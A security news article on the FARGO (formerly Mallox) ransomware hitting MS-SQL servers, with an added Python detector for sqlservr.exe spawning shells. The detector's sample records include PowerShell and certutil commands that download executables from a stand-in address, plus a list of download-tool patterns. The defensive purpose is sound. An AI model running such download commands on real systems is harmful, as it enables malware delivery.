FARGO ransomware targets vulnerable SQL Servers
According to the latest report from ASEC (AhnLab Security Emergency Response Center), a new ransomware strain is being distributed that targets vulnerable Microsoft SQL servers.
The FARGO ransomware is not entirely new: an earlier variant was tracked under the name Mallox, after the .mallox extension it appended to encrypted files.
Because Microsoft SQL Server is a relational database management system that stores and serves data for many applications and internet services, a compromised SQL server can be a huge problem for a corporation.
According to ASEC, infection begins when the MS-SQL process downloads a .NET file through the command prompt (cmd.exe) or PowerShell. The downloaded file in turn fetches and loads additional malware, which typically stops specific processes and services. From a defender's point of view, the database service process spawning a shell that reaches out to the network is unusual on most servers and is the natural point at which to detect this chain.
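To make the initial-access step concrete, here is an added detection example; it is not code from ASEC or from the article. It scans constructed, Sysmon-style process-creation records (simplified to a flat `Field=value|Field=value` line format) for the MS-SQL service process (sqlservr.exe) spawning cmd.exe or PowerShell, and raises the severity when the child's command line looks like a download. The download keyword list, the sample file paths and the 192.0.2.10 address are assumptions for illustration, not indicators from the report.

```python
"""Detect the sqlservr.exe -> cmd.exe/powershell.exe -> download pattern.

Added example, not from the ASEC report. Input lines are constructed
Sysmon Event ID 1 style records flattened to 'Key=value|Key=value'.
"""
import re
from dataclasses import dataclass

# Parent images treated as the MS-SQL service process.
SQL_SERVER_IMAGES = {"sqlservr.exe"}
# Child images treated as a shell (pwsh.exe added as an assumption).
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Illustrative download indicators (assumption: not taken from the report),
# matched against the lower-cased child command line.
DOWNLOAD_PATTERNS = [
    r"invoke-webrequest", r"\biwr\b", r"downloadfile", r"downloadstring",
    r"\bcurl\b", r"\bwget\b", r"\bcertutil\b.*-urlcache",
    r"bitsadmin.*/transfer", r"https?://",
]


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return 'high', 'medium' or None for one process-creation event.

    medium: sqlservr.exe spawned a shell (abnormal on most servers).
    high:   ...and that shell's command line looks like a download.
    Non-shell children (e.g. certutil.exe launched directly) are out of
    scope here because the article only describes cmd/PowerShell.
    """
    if basename(event.parent_image) not in SQL_SERVER_IMAGES:
        return None
    if basename(event.image) not in SHELL_IMAGES:
        return None
    cmd = event.command_line.lower()
    if any(re.search(p, cmd) for p in DOWNLOAD_PATTERNS):
        return "high"
    return "medium"


def parse_line(line):
    """Parse a constructed 'ParentImage=..|Image=..|CommandLine=..' record."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return ProcessEvent(fields["ParentImage"], fields["Image"],
                        fields["CommandLine"])


def scan(lines):
    """Return [(severity, command_line), ...] for every matching event."""
    hits = []
    for line in lines:
        event = parse_line(line)
        severity = classify(event)
        if severity:
            hits.append((severity, event.command_line))
    return hits


# Constructed sample records (paths and the 192.0.2.10 address are made up).
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
SAMPLE_EVENTS = [
    # sqlservr -> cmd -> PowerShell download: the chain described by ASEC.
    "ParentImage=" + SQLSERVR + r"|Image=C:\Windows\System32\cmd.exe"
    r"|CommandLine=cmd.exe /c powershell -nop -w hidden -c "
    r"(New-Object Net.WebClient).DownloadFile('http://192.0.2.10/update.exe','C:\ProgramData\update.exe')",
    # sqlservr -> PowerShell without any download indicator.
    "ParentImage=" + SQLSERVR
    + r"|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell.exe -Command Get-Date",
    # An interactive user shell: wrong parent, must not fire.
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\cmd.exe"
    r"|CommandLine=cmd.exe /c dir",
    # sqlservr -> non-shell child: outside the pattern the article describes.
    "ParentImage=" + SQLSERVR + r"|Image=C:\Windows\System32\certutil.exe"
    r"|CommandLine=certutil.exe -urlcache -f http://192.0.2.10/a.exe a.exe",
]

if __name__ == "__main__":
    for severity, cmd in scan(SAMPLE_EVENTS):
        print(severity, cmd)
```

Run as-is, the script reports the first sample as high and the second as medium. In production the same two-stage logic maps onto a Sysmon or EDR process-creation query keyed on ParentImage; the last sample shows why a rule limited to cmd.exe and PowerShell should be broadened to other download-capable binaries once the basic rule is in place.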
“The ransomware’s behavior begins by being injected into AppLaunch.exe, a normal Windows program. It attempts to delete a registry key on a certain path, and executes the recovery deactivation command, and closes certain processes,” ASEC explained.
The ASEC researchers also note that FARGO does not encrypt every file, so the system remains partly usable.
Encrypted files are renamed with the .Fargo3 extension, and a ransom note named “RECOVERY FILES.txt” is dropped in the affected folder. The note threatens that the victim’s files will be permanently deleted or publicly released if the ransom is not paid, or if the victim tries to decrypt the files with third-party software.